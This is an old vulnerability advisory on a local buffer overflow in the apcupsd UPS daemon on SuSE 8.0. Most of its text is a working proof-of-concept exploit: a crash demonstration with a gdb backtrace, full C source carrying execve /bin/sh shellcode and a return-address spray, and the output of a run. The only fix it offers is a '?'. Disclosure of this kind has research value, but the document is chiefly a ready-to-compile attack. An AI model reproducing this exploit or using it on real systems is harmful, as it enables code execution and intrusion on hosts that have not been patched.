COMMAND

	apcupsd local buffer overflow

SYSTEMS AFFECTED

	tested with apcupsd delivered with Suse 8.0

PROBLEM

	Thanks to Serkan Akpolat [sakpolat@gmx.net] advisory :
	
	Apcupsd is a deamon for most APC's UPS for  Linux  There  is  no  bounds
	checking in the source code ,so  overflowing  the  buffer  is  possible.
	Apcupsd is by default not setuid root (SuSE  8.0)  A  proof  of  concept
	shell spawning exploit is attached to mail.
	
	milkshake:~ # apcupsd -f
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	Segmentation fault (core dumped)
	milkshake:~ # gdb -q /sbin/apcupsd ./core
	(no debugging symbols found)...
	Core was generated by `apcupsd -f
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
	Program terminated with signal 11, Segmentation fault.
	Reading symbols from /lib/libpthread.so.0...(no debugging symbols
	found)...done.
	[New Thread 1024 (LWP 1920)]
	Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
	Loaded symbols for /lib/libc.so.6
	Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
	found)...done.
	Loaded symbols for /lib/ld-linux.so.2
	#0  0x40091a99 in vfprintf () from /lib/libc.so.6
	(gdb) bt
	#0  0x40091a99 in vfprintf () from /lib/libc.so.6
	#1  0x400a8a86 in vsprintf () from /lib/libc.so.6
	#2  0x08049b0c in strcpy ()
	#3  0x41414141 in ?? ()
	(gdb) q
	
	Exploit spawns a shell with the uid of the user ,who runs  the  exploit.
	Tested on SuSE 8.0
	
	milkshake:~ # cat eXapcupsd.c
	/* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
	/* This code has been tested in SuSE 8.0 -----------------------------------*/
	/* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
	/* This code spawns a shell with the uid of the user, who runs the expolit*/
	/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr team---*/
	/* Written by Serkan Akpolat sakpolat@gmx.net --------------------------*/
	
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#define BUFSIZE 500
	#define PADDING 3
	char sc[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";
	/* Murat Balaban execve /bin/sh shellcode                    */
	
	int main(void)
	{
	
	char *env[3] = {sc, NULL};
	char buf[BUFSIZE];
	int i,j,ret;
	int *ap;
	for(j=0;j < PADDING;j++){
	buf[j]='A';}
	ap = (int *)(buf + PADDING);
	ret = 0xbffffffa - strlen(sc) -strlen("/sbin/apcupsd");
	printf("Shellcode is on 0x%08x , %d junk bytes used for
	alignment.\n",ret,PADDING);
	printf("\t\t<--PRESS ENTER-->");
	for (i = 0; i < BUFSIZE - 8; i += 4)
	*ap++ = ret;
	*ap++ ='\0';
	getchar();
	execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
	}
	
	
	milkshake:~ # gcc eXapcupsd.c
	milkshake:~ # ./a.out
	Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
	<--PRESS ENTER-->
	apcupsd FATAL ERROR in apcconfig.c at line 833
	Error opening configuration file
	(AAAÀÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿): ë~^
	

SOLUTION

	?